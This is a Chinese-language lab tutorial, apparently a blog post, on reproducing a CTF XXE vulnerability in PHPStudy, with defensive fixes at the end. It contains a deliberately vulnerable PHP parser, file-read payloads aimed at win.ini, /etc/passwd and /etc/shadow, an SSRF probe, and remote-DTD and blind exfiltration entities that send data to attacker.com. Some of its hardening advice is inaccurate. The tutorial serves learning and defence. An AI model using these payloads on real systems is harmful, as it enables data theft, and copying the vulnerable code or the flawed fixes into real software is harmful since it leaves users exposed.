新手也能懂:用PHPStudy本地复现QSNCTF那道XXE漏洞题(附完整Payload)
从零搭建XXE漏洞实验环境:PHPStudy实战指南
第一次接触CTF比赛中的XXE漏洞时,很多人会被那些看似神秘的XML代码吓退。但事实上,只要有一个合适的实验环境,任何Web安全新手都能在半小时内理解并复现这个经典漏洞。本文将带你用最常见的PHPStudy工具,在Windows电脑上完整搭建XXE漏洞实验靶场,并通过BurpSuite和手工构造Payload两种方式实现文件读取。
1. 环境准备与漏洞原理
XXE(XML External Entity Injection)漏洞的本质是XML解析器对外部实体的不当处理。想象一下,XML就像是一个可以自定义标签的文档格式,而"外部实体"则相当于文档中的变量引用——这些变量可以指向本地文件、远程URL等资源。当服务器解析用户提交的恶意XML时,就会像执行了"变量替换"一样把敏感文件内容泄露出来。
要在本地复现这个漏洞,我们需要以下组件:
- PHPStudy v8.1(集成Apache+PHP环境)
- PHP 5.6.9(该版本默认不禁用外部实体引用)
- 文本编辑器(VS Code或Notepad++)
提示:建议在虚拟机中进行实验,避免影响主机环境配置
安装完成后,在PHPStudy的"网站"目录下创建xxe-test文件夹,新建index.php文件:
<?php libxml_disable_entity_loader(false); $xmlfile = file_get_contents('php://input'); $dom = new DOMDocument(); $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD); $creds = simplexml_import_dom($dom); echo $creds->name; ?>这段代码的关键问题在于:
- 主动启用外部实体加载(
libxml_disable_entity_loader(false)) - 直接解析用户输入的原始数据(
php://input) - 使用危险标志组合(
LIBXML_NOENT | LIBXML_DTDLOAD)
2. 手工构造XXE Payload
我们先不用任何专业工具,仅用浏览器和记事本完成漏洞利用。在xxe-test目录下创建test.html:
<form action="http://localhost/xxe-test/index.php" method="POST" enctype="text/plain"> <textarea name="xml" rows="10" cols="50"> <?xml version="1.0"?> <!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///C:/Windows/win.ini"> ]> <root> <name>&xxe;</name> </root> </textarea> <input type="submit" value="提交"/> </form>这个表单会向漏洞页面发送包含外部实体引用的XML数据。点击提交后,你应该能在页面看到win.ini文件的内容。这就是最基本的XXE文件读取实现。
常见可读取的敏感文件路径包括:
| 操作系统 | 文件路径 | 信息类型 |
|---|---|---|
| Windows | C:\Windows\System32\drivers\etc\hosts | 网络配置 |
| Linux | /etc/passwd | 用户账户 |
| Linux | /proc/self/environ | 环境变量 |
3. 使用Burp Suite专业测试
对于更复杂的测试场景,Burp Suite是更高效的选择。配置步骤如下:
- 启动Burp Suite,在Proxy→Options添加监听端口(如8080)
- 浏览器设置代理为127.0.0.1:8080
- 访问http://localhost/xxe-test/test.html
- 拦截请求后,修改Content-Type为
application/xml - 替换请求体为以下Payload:
<?xml version="1.0"?> <!DOCTYPE data [ <!ENTITY % dtd SYSTEM "http://attacker.com/malicious.dtd"> %dtd; ]> <root>&exfil;</root>这种分阶段攻击的原理是:
- 首先加载远程DTD文件(需要公网服务器)
- 在DTD中定义参数实体和后续操作
- 实现数据外带等高阶利用
4. 漏洞防御与加固方案
理解漏洞后,修复方案其实非常简单。以下是PHP中防御XXE的几种方法:
方案一:禁用外部实体
libxml_disable_entity_loader(true);方案二:使用白名单过滤
$allowed = ['name', 'email', 'phone']; foreach($creds as $key => $value) { if(!in_array($key, $allowed)) { unset($creds->$key); } }方案三:替换XML解析器
$data = json_decode(file_get_contents('php://input'), true);对于现代PHP项目,建议直接采用以下配置组合:
; php.ini配置 allow_url_fopen = Off allow_url_include = Off libxml_disable_entity_loader = On在实际项目代码审查时,要特别注意以下危险函数的使用:
simplexml_load_string()DOMDocument::loadXML()xml_parse()
5. 拓展实验:非常规利用技巧
除了文件读取,XXE还有更多进阶利用方式。在实验环境中可以尝试:
SSRF探测内网
<!ENTITY xxe SYSTEM "http://192.168.1.1:8080/internal">盲注数据外带
<!ENTITY % file SYSTEM "file:///etc/passwd"> <!ENTITY % eval "<!ENTITY % exfil SYSTEM 'http://attacker.com/?leak=%file;'>"> %eval; %exfil;XInclude攻击
<root xmlns:xi="http://www.w3.org/2001/XInclude"> <xi:include href="file:///etc/shadow" parse="text"/> </root>这些实验都需要配合网络抓包工具观察请求流向。建议使用Wireshark监控本地回环流量,分析攻击产生的实际网络请求。
完成所有实验后,记得在PHPStudy中恢复默认配置,或直接删除测试用的虚拟主机。安全研究的第一原则就是避免实验代码泄露到生产环境。